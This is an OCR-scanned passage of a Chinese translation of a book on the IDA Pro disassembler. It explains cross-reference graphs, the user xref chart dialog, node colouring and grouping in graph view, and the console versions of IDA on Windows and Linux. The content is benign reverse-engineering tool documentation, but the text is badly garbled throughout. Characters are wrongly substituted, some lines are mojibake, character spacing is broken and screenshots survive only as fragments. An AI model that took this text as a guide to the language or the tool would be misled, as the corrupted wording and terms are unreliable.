IDA 可 以 为 全 局 符号 C PR E RR) ARE) 生成 两 种 类 型 的 交叉 引用 图 : 目标 符号 交叉 引用 图 
| View » Graphs > Xrefs To〈 交 叉 引 用 目标 )」】 和 源 符 号 交叉 引用 图 | View » Graphs » Xrefs From 
(交叉 引用 源头 )j]。 要 生成 “交叉 引用 目标 ”图 形 ， 必 须 执 行 递 归 上 升 操作 ， 即 回溯 所 有 以 选 定 
的 符号 为 目标 的 交叉 引用， 和 耻 到 到 达 一 个 没有 其 他 符号 引用 的 符号 。 在 分 析 二 进 制 文件 时 ,你 可 
以 使 用 “交叉 引用 目标 ”图 形 回 答 下 面 的 问题 ， 要 到 达 这 个 函数 ， 必 须 进行 哪些 函数 调用 ? 
图 9-9 即使 用 了 “交叉 引用 目标 ”图 形 来 显示 到 达 puts PARERE s 

同样 ,“ 交 叉 引 用 目标 ”图 形 还 可 以 帮助 你 更 加 直观 地 显示 引用 茶 个 全 局 变量 的 所 有 位 置 ， 
以 及 到 达 这 些 位 置 所 需 的 吨 数 调用 链 。 交 叉 引 用 图 形 是 唯一 能 够 合并 数据 交叉 引用 信息 的 网 形 。 

为 了 创建 “交叉 引用 源头 ”网 形 ， 需 要 执行 递归 下 降 操 作 ， 即 跟踪 所 有 以 选 定 的 符号 为 源头 
的 交叉 引用 。 如 采 符 号 是 一 个 轴 数 名 ,， 则 只 跟踪 以 该 图 数 为 源头 的 调用 引用 ,因此 ,图 形 中 不 会 
显示 对 全 局 变量 的 数据 引用 。 如 果 符 号 是 一 个 初始 化 全 局 指针 变量 ( 表示 它 确 实 指 问 某 个 项 目 )， 
则 跟踪 其 对 应 的 数据 偶 移 量 交 叉 引 用 。 如 采 要 以 图 形 表 示 以 一 个 图 数 为 源头 的 交叉 引用 , 最 好 是 
绘制 以 该 函数 为 源头 的 函数 调用 图 ， 如 图 9-10 所 示 。 


~ WinGraph32 - Xrefs to .puts 
File View Zoom Move Help 
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二 WinGraph32 - Xrefs from main -Ioj x| 
File View zoom Move Help 


a &|e || E eese vc 
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110.00% (80,0) 5 nodes, 6 edge segments, 0 crossings P [141.679 (40,0) [6 nodes, 7 edge segments, 0 crossings 7 
图 9-9 “交叉 引用 目标 ”图 形 图 9-10 “交叉 引用 源头 ”图 形 
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可 惜 ， 如 果 一 个 函数 的 调用 图 非常 复 淋 ， 那么， 在 以 图 形 表 示 该 也 数 的 交叉 引用 时 ,同样 会 
得 到 极其 杂乱 的 图 形 。 

4. 自 定 义 交 又 引用 图 

目 定 义 交 义 引 用 图 在 IDA 中 叫做 用 户 交 叉 引 用 图 (user xref chart )， 它 在 生成 交叉 引用 图 方 
面 提供 了 最 大 的 灵活 性 ,以 适应 用 户 的 需求 。 除 了 将 以 某 个 符号 为 目标 和 以 该 符号 为 源头 的 交叉 
引用 组 合 到 单独 一 幅 图 外 , 目 定 义 交 又 引用 图 还 允许 你 指定 最 大 递归 深度 , 以 及 生成 的 图 形 应 包 
括 或 排除 的 符号 类 型 。 

使 用 View » Graphs » User Xrefs Chart 可 打开 如 图 9-11 所 示 的 “图 形 定制 ”对 话 框 。 在 根据 
对 话 框 指定 的 选项 生成 的 图 形 中 ,指定 地 址 邦 围 内 的 每 个 全 局 符号 均 以 市 点 显示 。 通常 ,要 生成 
以 单独 一 个 符号 为 源头 的 交叉 引用 图 , 对 话 框 中 的 起 始 和 结束 地 址 完全 相同 。 如 果 起 始 和 结束 地 
址 不 同 , 则 IDA 会 为 指定 地 址 范围 内 的 所 有 非 局 部 符号 生成 交 又 引用 图 。 如 果 起 始 地 址 是 数据 
库 中 最 低 的 地 址 ， 而 结束 地 址 是 数据 库 中 最 高 的 地 址 ,在 这 种 极端 情况 下 ,生成 的 图 形 为 整个 二 
进 制 文件 的 函数 调用 网 。 
































3 User xrefs chart ?| xl 
Start address | text:08C4846F "| 
End address | text:08C4846F "| 


starting direction 
fw Cross references to 


fw Cross references from 





图 9-11 “用 户 交 叉 引 用 图 ”对 话 框 


图 9-11 中 选择 的 选项 为 所 有 目 定 义 交 叉 引 用 图 的 默认 选项 。 每 组 选项 的 作用 如 下 。 

O Starting direction (起 始 方 向 )。 这 两 个 选项 用 于 决定 是 搜索 以 选 定 的 符号 为 源头 的 交 又 
引用 、 以 选 定 的 符号 为 目标 的 交叉 引用 ， 还 是 这 两 种 交 又 引用 。 如 果 其 他 选项 均 使 用 默 
认 设 置 ， 将 起 始 方向 限制 为 “交叉 引用 目标 ”( Cross references to) 将 得 到 一 幅 “ 交 叉 引 
用 目标 ”网 ， 而 将 起 始 方 回 限制 为 “交叉 引用 源头 ”( Cross references from ) 将 得 到 一 幅 
“交叉 引用 源头 ”图 。 
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O Parameters (参数 )。Recursive 选项 从 选 定 的 符号 开始 执行 递归 下 降 (〈 交 叉 引 用 源头 ) 或 
递归 上 升 〈 交 义 引 用 目标 ) Follow only current direction C DUREE 24817; I8] ) 迫使 递归 仪 
哨 一 个 方 回 执行。 换 名 话说， 一旦 选中 这 个 选项 ， 如 果 由 市 点 A 发 现 方 点 B， 则 递归 下 
降 到 B 将 添加 其 他 只 有 从 市 点 B 才 能 到 达 的 节点 ， 而 新 发 现 的 、 引 用 市 点 B 的 市 点 将 不 
会 添加 到 图 形 中 。 如 果 取 消 选中 Follow only current direction 选项 ， 并 同时 选择 两 个 起 始 
方 回 ， 那 么 ， 每 个 添 加 到 图 形 中 的 节点 将 回 目 标 和 源头 两 个 方 同 递归 。 

O Recursion depth (递归 深度 )。 这 个 选项 设置 最 大 递归 深度 ,可 用 于 限制 生成 的 图 形 的 大 
小 。 将 这 个 选项 设置 为 -1， 递归 将 达到 最 深 并 生成 最 大 的 图 形 。 

O Ignore (忽略 )。 这 些 选项 规定 将 哪些 市 点 排除 在 生成 的 图 形 之 外 。 这 是 男 一 种 限制 图 形 大 
小 的 方法 。 具 体 来 说 ， 忽 略 以 库 吗 数 为 源头 的 交叉 引用 将 得 到 静态 链接 二 进 制 文件 中 非常 
简化 的 图 形 。 这 种 技巧 可 确保 IDA 识别 尽 可 能 多 的 库 了 水 数 。 库 代码 识别 将 在 第 12 草 中 讨论 。 

O Print options (打印 选项 )。 这 些 选 项 控制 图 形 格 式 化 的 两 方面 。Print comments ( 打印 注 
TE) 会 将 任何 函数 注释 包含 在 一 个 也 数 的 图 形 节 点 中 。 如 采 选 择 Print recursion dots ( 1T 
印 递 归 点 )， 递 归 将 超越 指定 的 递归 限制 ， 这 时 ，IDA 会 显示 一 个 包含 省 略 喜 的 节点 ， 表 
示 可 以 进一步 执行 递归 。 

为 我 们 的 示例 程序 中 的 depth_1 函数 生成 的 目 定 义 交 义 引 用 图 如 图 9-12 所 示 。 这 里 我 们 使 用 

的 是 默认 设置 ， 递 归 深 度 为 1。 


二 WinGraph32- User defined xrefs chart: depti 
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110.00% ((60,0) [ nodes, 8 edge segments, 0 crossings A 
图 9-12 ”函数 depth 1 的 用 户 交 叉 引 用 图 
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用 户 生 成 的 交叉 引用 图 是 IDA 中 最 强大 的 外 部 图 形 。 外 部 流程 图 已 经 被 IDA 的 集成 反 汇 编 
图 形 视 图 取代 ， 其 他 外 部 图 形 不 过 是 用 户 生 成 的 交叉 引用 图 的 精简 版 本 。 











9.2.2 ”IDA 的 集成 绘图 视图 





IDA 在 5.0 版 中 引入 了 一 项 人 们 期 每 已 久 的 功能 , 即 与 IDA 又 密集 成 的 交互 式 反 汇 编 图 形 视 
图 。 如 前 所 述 ， 集 成 绘图 模式 提供 了 邦 外 一 种 界面 ， 以 特 代 标准 的 文本 式 反 汇编 代码 清单 。 在 图 
形 模式 中 , 经 过 反 汇 编 的 函数 以 类 似 于 外 部 流程 图 的 控制 流 图 形 显示 。 由 于 这 种 模式 使 用 的 是 面 
回 困 数 的 控制 流 图 形 ， 因 此 ,， 它 一 次 只 能 显示 一 个 图 数 。 而 且 ， 图 形 模式 不 能 用 于 显示 函数 以 外 
的 指令 。 如 于 和 希望 一 次 显示 几 个 函数 ， 或 者 需要 得 看 不 属于 某 个 函数 的 指令 ， 就 必须 返回 面 回 文 
本 的 反 汇 编 代 码 清单 。 

ER SEP, 我们 证 细 介绍 了 图 形 视 图 的 基本 操作 ,这 里 还 逢 要 重申 几 点 。 要 在 文本 视图 与 
图 形 视 图 之 间 切 换 , 可 以 按 下 空格 键 , 或 者 右 击 反 汇编 窗口 , 然后 在 上 下 文 洒 单 中 选择 Text View 
或 Graph View. 平移 图 形 的 最 镜 单 方法 是 单 击 图 形 视 图 的 痛 景 , 并 参 适 当 的 方向 拖 动 图 形 。 对 于 
较 大 的 图 形 ， 使 用 Graph Overview ( 网 形 概览 ) 窗口 进行 平移 会 更 加 方便 。 "图形 概览 ”窗口 中 
始终 显示 有 一 个 虚线 矩形 框 , 框 中 的 图 形 与 当前 反 汇编 窗口 中 显示 的 内 容 相对 应 。 你 可 以 随时 单 
击 并 拖 动 这 个 虚线 框 ， 以 重新 定位 图 形 视 图 。 因 为 “图 形 概览 ”窗口 中 显示 了 整个 图 形 的 缩 略 版 
本 ,使 用 它 平 移 会 更 加 方便 ,你 不 必 像 在 反 汇 编 窗 口中 平移 大 型 图 形 那 样 , 频繁 释放 鼠标 按钮 并 
重新 确定 鼠标 的 位 置 。 

图 形 模式 和 文本 模式 的 反 汇 编 视 网 的 操作 方法 并 没有 明显 的 差异 。 如 你 所 愿 ， 双 击 导 航 仍 
然 有 效 ， 导 航 历史 记录 同样 如 此 。 任 何 时 候 ， 如 采 你 导航 到 一 个 不 属于 函数 的 茶 个 位 置 〈《 如 全 
局 变量 )， 反 汇编 窗口 将 目 动 切换 到 文本 模式 。 一 旦 你 再 次 导航 到 函数 范围 内 ，IDA 将 目 动 返 
回 图 形 模式 。 在 图 形 模式 中 ,访问 栈 变量 的 方法 与 在 文本 模式 中 使 用 的 方法 完全 相同 ,摘要 栈 
钢 图 在 显示 的 函数 的 根基 本 块 中 显示 。 和 在 文本 模式 下 一 样 ， 双 击 任何 栈 变 量 ， 即 可 访问 详细 
栈 帆 视图。 在 图 形 模式 中 ， 文 本 模式 中 格式 化 指令 操作 数 的 所 有 选项 仍然 有 效 ， 访问 方法 也 完 
全 相同 。 

图 形 模式 下 用 户 界 面 的 主要 变化 与 各 图 形 市 点 有 关 。 图 9-13 I&— 1 fü] P489 DE TS ea AHAH 
关 的 标题 栏 控制 按钮 。 
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eax, [ebp-*arg 8] 
[ebp*var 4], eax 








典型 的 展开 图 形 视图 
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从 左 到 右 , 节点 标题 栏 上 的 3 个 按钮 分 别 可 用 于 更 改 方 点 的 背景 闫 色 , 分 配 或 更 改 市 点 名 称 ， 
以 及 访问 以 该 节点 为 目标 的 交叉 引用 列表 。 更 改 市 点 的 颜色 可 作为 一 种 提醒 ， 告诉 你 目 己 ,你 已 
经 分 析 了 这 个 节点 ,或 者 只 是 将 该 方 点 与 其 他 市 点 区 分 开 , 因为 其 中 包含 有 你 特别 感 兴趣 的 代码 。 
只 要 给 节点 分 配 了 颜色 , 文本 模式 下 对 应 的 指令 也 会 使 用 这 种 颜色 作为 背景 色 。 要 取消 颜色 的 分 
配 , 右 击 方 点 的 标题 栏 , 在 上 下 文 末 单 中 选择 Set node color to default ( 设置 默认 节点 颜色 ) 即 可 。 

图 9-13 标题 柱 上 中 间 的 那个 按钮 用 于 给 市 点 基本 块 的 第 一 条 指令 的 地 址 分 配 名 称 。 基 本 块 
通常 是 跳 转 指令 的 目标 ,许多 节点 由 于 是 跳 转交 叉 引 用 的 目标 , IDA 会 始终 为 它们 分 配 一 个 哑 名 。 
但 是 ，IDA 也 可 能 不 给 基本 块 分 配 名 称 。 以 下 面 这 段 代 码 为 例 : 



































.text:00401041 0 jg short loc 401053 
. text : 00401043 mov ecx, [ebp«arg 0] 


@ 处 的 指令 拥有 两 个 潜在 的 “继任 者 ”: loc 401053 和 四处 的 指令 。 由 于 它 有 两 个 “继任 者 ”， 
@ 必 须 终 止 一 个 基本 块 , 这 使 得 @ 成 为 一 个 新 的 基本 块 中 的 第 一 条 指令 , 即使 它 并 不 是 跳 转 目标 ， 
IDA 也 没有 为 其 分 配 旺 名 。 

图 9-13 中 最 右边 的 按钮 用 于 访问 以 该 节点 为 目标 的 交 又 引用 列表 。 由 于 默认 情况 下 ， 图 形 
视图 并 不 显示 交叉 引用 注释 , 使 用 这 个 按钮 可 直接 访问 并 导航 到 任何 引用 该 节点 的 位 置 。 与 前 面 
讨论 的 交叉 引用 列表 不 同 , 这 里 生成 的 和 点 交叉 引用 列表 中 还 包含 一 个 指 回 节点 的 普通 流 的 条 目 
(类 型 为 ^)。 这 样 做 是 必要 的 ， 因 为 在 图 形 视图 中 ， 某 个 市 点 的 线性 “前 任 者 ”到 底 是 哪 一 个 市 
点 ， 并 不 总 是 非 党 明显。 如 果 你 希望 在 图 形 模 式 下 查看 正 浓 的 交叉 引用 注释 ， 可 通过 
Options 》 General 选择 Cross-Reference 选项 卡 ， 将 Number of displayed xrefs ( 显示 的 交叉 引用 数 
量 ) 选项 设置 为 0 以 外 的 其 他 值 即 可 。 

为 降低 图 形 的 混乱 程度 ,可 以 将 图 形 中 的 和 点 单独 或 
与 其 他 市 点 一 起 进行 分 组 。 要 为 多 个 节点 分 组 ， 在 按 下 
CTRL 键 的 同时 ,用 鼠标 单 击 将 要 分 组 的 每 个 节点 的 标题 
FE, 然后 右 击 任何 选 定 市 点 的 标题 栏 , 在 上 下 文 沫 单 中 选 
择 Group nodes Hl nf, 这 时 a IDA 会 提示 你 输入 一 段 文本 图 9-14 典型 me ( 分 组 ) 图 形 视 图 
(默认 为 组 中 的 第 一 条 指令 )， 作 为 折合 市 点 的 显示 文本 。 

将 图 9-13 中 的 节点 分 组 ， 并 将 节点 文本 更 改 为 collapsed node demo (HÆTT AWR ) 后 ， 得 到 如 
图 9-14 PTAR BS Ae 

需要 注意 的 是 , 这 时 标题 栏 上 出 现 了 另外 两 个 按钮 。 按 从 左 到 右 的 顺序 ,这 些 按钮 分 别 用 于 
打开 被 分 组 的 节点 和 编辑 万 点 文本 。 打 开 一 个 节 点 是 指 将 组 中 的 节点 恢复 到 最 初 的 形式 ， 它 不 会 
改变 节点 现在 属于 某 个 组 这 一 事实 。 打 开 一 个 组 后 ， 上 面 提 到 的 两 个 新 按钮 将 会 消失 ,取而代之 
的 是 一 个 “ 折 针 组” 按钮。 使 用 Collapse Group 按钮 ,或 右 击 组 中 任何 市 点 的 标题 栏 并 选择 Hide 
Group， 可 以 再 次 将 打开 的 组 折 著 起 来 。 要 完全 撤销 应 用 于 一 个 或 几 个 市 点 的 分 组 ， 你 必须 右 击 
折 获 节点 或 一 个 打开 的 节点 的 标题 栏 ， 并 选择 Ungroup Nodes ( 取消 节点 分 组 ) 这 项 操作 会 打开 
当前 处 于 折 著 状态 的 组 。 




































































9.3 小 结 


图 形 是 一 种 强大 的 工具 , 可 帮助 你 分 析 任 何 二 进 制 文件 。 如 采 你 习惯 于 查看 纯 文本 格式 的 反 
汇编 代码 清单 ， 可 能 需要 一 段 时 间 适 应 ， 以 使 用 图 形 视图 。 在 IDA 中 ， 文 本 模式 提供 的 所 有 信 
县 在 图 形 模 式 下 仍然 有 效 。 不 过 , 它们 的 格式 可 能 稍 有 不 同 。 例 如 , 在 图 形 视图 中 ,交叉 引用 变 
成 了 连接 基本 块 的 边 。 

选择 合适 的 图 形 对 于 使 用 图 形 分 析 过 程 的 优化 非常 重要 。 如 有 果 你 希望 知道 如 何 转 至 某 个 函 
数 ， 你 可 能 会 对 函数 调用 或 交 又 引用 图 感 兴趣 。 如 有 果 你 想 知 道 如 何 转 至 某 条 指令 ,你 会 对 控制 流 
图 形 更 感 兴趣 。 

过 去 ， 用 户 在 使 用 IDA 的 绘图 功能 时 会 遇 到 一 些 困 难 ， 这 主要 是 wingraph32 应 用 程序 及 其 
相关 图 形 缺 乏 灵 活性 所 致 。 目 IDA 引入 集成 化 反 汇编 图 形 模式 后 ， 这 些 困难 有 一 部 分 得 到 了 人 解 
决 。 BÆ, DA 主要 是 一 个 反 汇编 融 ， 生 成 图 形 并 不 是 它 的 主要 用 途 。 对 专用 的 图 形 分 析 工 具 感 
兴趣 的 读者 可 以 研究 专门 用 于 此 类 目的 的 应 用 程序 ， 如 BinNavi”， 这 款 工 具 是 Halvar Flake 的 公 
司 Zynamics” 开 发 的 。 



































(D 参见 http:/www.zynamics.com/ =binnavi html, 
(2 2011 Æ 3 H Google 收购 了 Zynamics。 
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EX, Windows GUI 版 本 是 IDA 系列 中 的 明星 。 目 IDA6.0 发 布 以 来 , 这 种 情况 已 经 发 
生 了 改变 ,因为 Linux 和 OSX 用 户 现 在 能 够 使 用 针对 他 们 平台 的 IDAGUI 版 本 。 然 而 ， 
这 个 新 版 本 的 出 现 并 不 能 改变 一 个 事实 ， 即 用 户 还 可 以 通过 其 他 一 些 方式 来 使 用 IDA。 最 初 的 
IDA 实际 上 是 一 个 MS-DOS 控制 台 应 用 程序 ， 至 今 ，IDA 仍然 沿用 这 种 控制 台 版 本 。 而 在 其 内 
置 的 远程 调试 功能 之 上 ，IDA 又 是 一 种 强大 的 分 析 和 调试 工具 。 
除 交 互 功能 外 ，IDA 的 所 有 版 本 都 提供 一 种 批 处 理 模式 ， 以 自动 处 理 大 量 文件 。 使 用 IDA 
进行 高 效 批 处 理 的 关键 在 于 了 解 每 个 DA 版 本 的 用 途 和 限制 ,并 根据 上 自己 的 需要 选择 适当 的 IDA 
版 本 。 本 章 将 讨论 如 何在 其 他 平台 上 运行 IDA， 以 及 如 何 充分 利用 IDA 的 批 处 理 功 能 。 


10.1 ER e X IDA 


IDA 所 有 控制 台 版 本 的 核心 是 一 个 叫做 T Vision 的 Borland 控制 台 LO 库 , 它 已 经 被 移植 到 各 
种 平台 上 ， 包括 Windows, Linux 和 Mac OS X 等。Hex-Rays 在 它 的 IDA 下 载 页 面 " 上 向 付 过 费 
的 IDA 用 户 提供 当前 TVision 的 源 代码 。 

在 各 种 平台 上 使 用 同一 个 库 可 以 使 所 有 控制 侣 版 本 的 用 户 界 面 保持 一 致 。 但 是 , 在 由 一 个 平 
台 迁 移 到 另 一 个 平台 时 ， 还 要 注意 一 些 问 题 ， 如 鼠标 文 持 、 尺 寸 调整 以 及 IDA 应 用 程序 使 用 热 
键 的 能 力 。 在 下 面 针 对 不 同 平台 的 几 市 内 容 中 ， 我 们 将 讨论 其 中 一 些 问题 及 其 解决 办 法 。 


10.1.1 控制 合 模 却 的 共同 特性 


顾名思义 ,控制 台 模 式 (console mode ) 是 指 基 于 文本 的 IDA 版 本 全 都 在 一 个 终端 或 菜 种 shell 
中 运行 。 这 些 控 制 台 对 于 尺寸 调整 和 鼠标 的 文 持 各 不 相同 ， 因 而 导致 了 各 种 你 需要 了 解 的 限制 。 
具体 存在 哪些 限制 因 你 使 用 的 平台 和 终端 程序 而 异 。 

控制 台 用 户 界 面 由 窗口 上 方 的 沫 单 栏 和 窗口 下 方 的 稼 用 操作 栏 组 成 , 菜单 栏 显 示 有 菜单 选项 和 
状态 ， 而 操作 栏 则 与 基于 文本 的 工具 栏 类 似 。 控制 台 使 用 热 键 或 通过 鼠标 ( 如 有 果 文 持 ) 进行 操作 。 
GUI 版 本 中 的 几乎 每 一 个 命令 在 控制 台 版 本 中 都 有 对 应 的 操作 。 同 时 , 控制 台 版 本 还 保留 了 GUI 






































(D 参见 http://www.hex-rays.com/idapro/idadown.htm. 
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版 本 的 热 刍 。 

IDA 显示 窗口 位 于 上 方 的 荣 单 栏 和 下 方 的 命令 栏 之 间 。 但 是 ,无 论 你 使 用 什么 终端 程序 ， 你 
都 面临 着 一 个 同样 的 限制 ， 如 果 屏 幕 仅 限于 显示 80x25 个 字符 ， 并 且 不 显示 图 形 时 ， 你 并 没有 
多 少 显示 空间 可 供 使 用 。 因 此 ，IDA 的 控制 台 版 本 通常 在 默认 情况 下 打开 两 个 显示 窗口 : 反 汇 编 
窗口 和 消息 窗口 。 为 了 更 接近 于 GUI 版 本 中 的 标签 显示 窗口 ，IDA 使 用 TVision PERS Gsm) 
能 来 显示 文本 窗口 ， 并 使 用 热 键 F6 (代替 窗口 标题 标签 ) 在 打开 的 窗口 之 间 切 换 。 每 个 窗口 都 
按 顺 序 进行 编号， 窗口 ID 位 于 窗口 的 左上 角 。 

如 果 你 的 控制 台 文 持 鼠 标 ， 你 就 可 以 通过 单 击 并 拖 动 显示 窗口 的 右 下 角 来 调整 窗口 的 大 小 。 
要 移动 显示 窗口 ,可 以 单 击 并 拖 动 窗 口 的 上 边框 ,如 果 控 制 台 不 支持 鼠标 ,你 可 以 使 用 Windows ， 
Resize 》 Move ( CTRL+FS ) 命令 ， 然 后 使 用 箭头 键 移动 窗口 的 位 置 ， 或 在 按 下 SHIFT 键 的 同时 ， 
使 用 箭头 键 调 整 活 动 窗口 的 大 小 。 如 果 你 的 终端 程序 可 以 使 用 鼠标 调整 大 小 , IDA 将 接受 新 的 终 
端 矿 寸 ， 并 相应 地 放大 (或 缩小 )， 以 适应 新 的 尺寸 。 

由 于 不 具备 图 形 功能 , 集成 反 汇 编 图 形 模 式 将 无 法 使 用 , 反 汇 编 代 但 清单 窗口 左 侧 也 不 会 显 
示 控 制 流 箭头 。 但 是 ， 控 制 台 版 本 仍然 可 以 打开 GUI 版 本 中 的 所 有 子 窗口 。 和 在 GUI 版 本 中 一 
样 ， 绝 大 多 数 的 子 窗口 都 可 以 通过 View Open Subviews 有 亲 单 访问 。 一 个 主要 的 不 同 在 于 , 十 六 
进 制 窗口 并 不 作为 一 个 单独 的 子 窗口 出 现 , 你 可 以 使 用 Options * Dump/Normal View( CTRL4FA ) 
命令 在 反 汇 编 窗口 与 十 六 进 制 窗口 之 间 切 换 。 要 同时 打开 一 个 反 汇 编 窗 口 和 一 个 十 六 进 制 窗口 ， 
你 必须 打开 另 一 个 反 汇 编 窗口 (View k Open Subviews * Disassembly )， 并 将 其 切换 到 十 六 进 制 形 
式 。 遗 憾 的 是 ， 你 没有 办 法 让 新 的 十 六 进 制 窗 口 与 现 有 的 反 汇 编 窗 口 同 步 。 

如 果 控 制 台 支持 有 鼠标， 浏览 反 汇编 代码 清单 的 方法 基本 与 GUI 版 本 类 似 ， 双击 任何 名 称 ， 反 
谍 编 和 窗口 将 跳 转 到 对 应 的 地 址 。 男 外 ， 将 光标 放 在 一 个 名 称 上 并 按 下 ENTER 键 ， 反 汇编 窗口 将 跳 
转 到 对 应 的 已 命名 位 置 (在 GUI 版 本 中 , 这 项 操作 的 功能 相同 )。 如 果 将 光标 放 在 一 个 栈 变 量 名 称 
上 并 按 下 ENTER 键 , 将 打开 相关 哺 数 的 详细 栈 巾 视图。 如 果 控 制 台 不 支持 鼠标 ,使 用 菜单 导航 的 
ALT+x 方 法 同样 可 以 实现 控制 台 的 许多 其 他 功能 ， 这 里 的 x 是 当前 屏幕 上 突出 显示 的 一 个 字符 。 






























































10.1.2 ”Windows 控 制 全 


Windows cmd.exe (在 Windows 9x 系列 中 为 command.exe ) 终 闹 并 不 十 分 灵活 ， 但 它 能 够 相 
当 完 美 地 支持 IDA 的 控制 台 版 本 。Windows 控制 台 版 本 的 IDA 叫做 idaw.exe, 而 GUI 版 本 的 IDA 
名 为 idag.exe， 对 应 版 本 的 64 位 二 进 制 文件 (由 高 级 版 本 的 IDA 提供 ) 分 别 为 idaw64.exe 和 
1dag64.exe。 

为 了 使 在 Windows 上 运行 的 IDA 文 持 鼠标 ， 你 必须 在 你 运行 的 终端 上 禁用 QuickEdit 模 式 。 
要 将 QuickEdit 模式 配置 为 终 绒 的 一 个 属性 ， 厂 击 终 问 标 题 栏 并 选择 Properties， 然 后 在 Options 
选项 卡 上 取消 选中 QuickEdit mode。 你 必须 在 启动 IDA 之 前 禁用 QuickEdit 模式 ， 因 为 在 IDA is 
行 时 ， 这 项 操作 并 不 能 立即 生效 。 

与 在 X Windows 下 运行 的 Linux 终端 不 同 ，cmd.exe 不 能 使 用 鼠标 来 扩展 从 而 放大 窗口 。 只 
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有 在 Windows F, IDA 的 控制 台 版 本 才 提 供 Window > Set Video Mode ( 窗口， 设置 视频 模式 ) 
ARR, npe 6 个 固定 的 终端 大 小 之 间 切 换 cmd.exe， 最 大 的 尺寸 为 255 x 100。 

虽然 反 汇 编 窗 口 不 显示 图 形 ， 但 你 仍然 可 以 使 用 IDA 的 外 部 绘图 模式 。 选 择 View » Graphs 
XE, IDA 将 启动 配置 图 查看 右 ( 如 qwingraph ) 显示 生成 的 图 形 。 在 Windows 版 本 的 IDA 中 ， 
你 可 以 一 次 打开 几 个 图 形 ， 并 在 打开 图 形 时 继续 使 用 IDA. 


10.1.3 Linux 控 制 台 


Linux 版 本 的 IDA 叫做 idal( 或 idal64 一 一 用 于 分 析 64 位 二 进 制 文件 ) 在 IDA6.0 之 前 , Linux 
和 OS X 控 制 台 版 本 是 IDA 的 标准 组 件 。 因 此 ， 在 你 将 这 些 控 制 台 版 本 复制 到 Linux 或 OS X^F 
人 台 时 ,你 还 必须 复制 IDA 密 钥 文件 ( ida.key ) 以 便 控 制 台 版 本 能 够 正常 运行 。 需要 注意 的 是 ， 这 
要 求 你 在 Windows 机 融 上 至 少 安装 一 次 IDA, 即 使 你 并 不 想 使 用 Windows 版 本 的 IDA。 至 于 Unix 
系统 ， 你 需要 将 密 钥 文件 复制 到 SHOME/.idapro/idakey。 如 果 你 没有 创建 这 个 目录 ， 当 你 第 一 次 
启动 IDA 时 ，IDA 会 自动 创建 IDA 个 人 设置 目录 ( $SHOME/.idapro )。 

安装 IDA 6.x 的 过 程 非 常 简 单 。 因 为 你 购买 的 IDA 6x 针对 的 是 特定 的 平台 ， 因 此 ， 要 安装 
该 版 本 ， 你 只 需 安 装 GUI 版 本 、 控 制 台 版 本 ， 然 后 将 IDA 密 钥 文件 复制 到 适当 位 置 即 可 。 

在 Linux 版 本 中 ,基本 的 导航 与 Windows 控制 台 版 本 中 类 似 。 本 贡 讨 论 几 个 有 关 Linux 版 本 
的 问题 。 通 党 , 由 于 用 户 对 Linux 版 本 的 言 好 各 不 相同 , 他们 选择 的 Linux 终端 程序 也 各 不 相同 。 
IDA 包含 一 个 名 为 tvtuning.txt 的 文件 ， 说 明 如 何 配 置 各 种 类 型 的 终端 ， 包 括 远 程 Windows 终端 
ZS Pio, DU SecureCRT 和 PuTTY 。 

使 用 Linux 终 端 程 序 时 你 面临 的 一 个 最 大 挑战 在 于 如 何 将 所 有 热 刍 原封 不 动 地 保留 给 IDA 使 
用 ， 而 不 致 被 终端 程序 占用 。 例 如 ， 热 键 ALT+F 打开 的 是 IDA 的 Fie 菜单 ， 还 是 控制 台 的 File 
菜单 呢 ?” 有 两 种 方法 可 以 解决 这 个 问题 ,一 是 使 用 一 个 热 键 与 IDA ZG HUSEHJZEXm REY. ` Mä 
辑 IDA 的 配置 文件 ， 重 新 设置 与 命令 对 应 的 热 键 ， 并 使 用 终端 没有 使 用 的 热 键 。 如 果 选 择 重 新 
设置 热 键 ， 可 能 需要 在 使 用 IDA 的 每 一 台 机 融 上 更 新 热 键 设 置 ， 以 免 造成 混淆 。 同 时 ， 你 会 发 
现 ， 你 很 难 与 使 用 默认 设置 的 其 他 DA 用 户 交 互 。 

如 果 选 择 使 用 标准 的 Linux 文本 显示 , 你 的 IDA 控制 台 将 采用 固定 大 小 ,鼠标 支持 将 取决 于 
你 是 否 使 用 了 GPM (Linux i A BASIRI AE )。 如 果 你 没有 使 用 GPM 提供 鼠标 文 持 ， 在 局 动 
IDA 时 ， 你 需要 为 TVision 指定 noGPM 选项 ， 如 下 所 示 : 


















































# TVOPT-noGPM ./idal [file to disassemble] 


控制 台 模 式 下 的 颜色 选择 相当 有 限 ， 需 要 调整 颜色 设置 (Options P Colors )， 以 确保 所 有 文 
本 都 正常 显示 ,不 会 与 背景 融合 。 控 制 台 模式 提供 4 种 预定 义 的 颜色 模板 ， 还 有 各 种 选项 ,用 于 
定制 反 汇编 窗口 各 个 部 分 所 使 用 的 颜色 ( 共 16 种 )。 

如 果 你 正和 运行 XXX， 那么 你 可 能 会 运行 KDE 的 konsole, Gnome 的 gnome-terminal, xterm 或 
其 他 一 些 终 端 。 除 xterm 外 ， 多 数 终端 都 提供 它们 目 己 的 菜单 和 相关 联 的 热 键 , 这些 热 键 可 能 与 
IDA B2 DI fH] xterm 运行 IDA 也 是 一 个 不 错 的 选择 , 虽然 它 不 一 定 是 视觉 效果 最 
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突出 的 终端 。KDE 的 konsole 是 我 们 首选 的 Linux 控制 台 ， 因 为 它 提供 最 整洁 的 外 观 、 最 少 的 热 
键 冲突 以 及 最 流畅 的 鼠标 性 能 。 

为 了 解决 与 在 各 种 X Windows 控制 台中 使 用 键盘 和 鼠标 的 问题 ，Jeremy Cooper 为 TVision 
库 开发 了 一 个 本 地 X11 端口 5。 使 用 这 个 改良 后 的 TVision， 你 就 可 以 在 它 的 X 窗 口中 运行 IDA， 
而 不 必 占 用 整个 控制 台 。 编 译 Cooper 的 TVision 端口 会 在 替代 libtvision.so ( idal 使 用 的 TVision 
共享 库 ) 时 造成 异 冲 。 安 装 新 库 后 ， 你 可 能 会 收 到 一 条 错误 消息 ， 称 在 你 答 试 运行 IDA 时 ， 有 
一 种 VGA 字体 无 法 加 载 。 如 果 出 现 这 种 和 情况， 你 需要 安装 该 VGA 字体 ， 并 告知 X 服 务 佣 该 字 
体 的 位 置 。 请 从 http://gilesorr.com/bashprompt/xfonts/ 下 载 一 种 合适 的 VGA 字体 (下载 vga 和 
sabvga )。 使 用 本 地 X11 端口 的 另 一 个 特点 是 : 你 可 以 将 X11 窗口 转发 到 另 一 侣 机 需 上 。 因 此 ， 
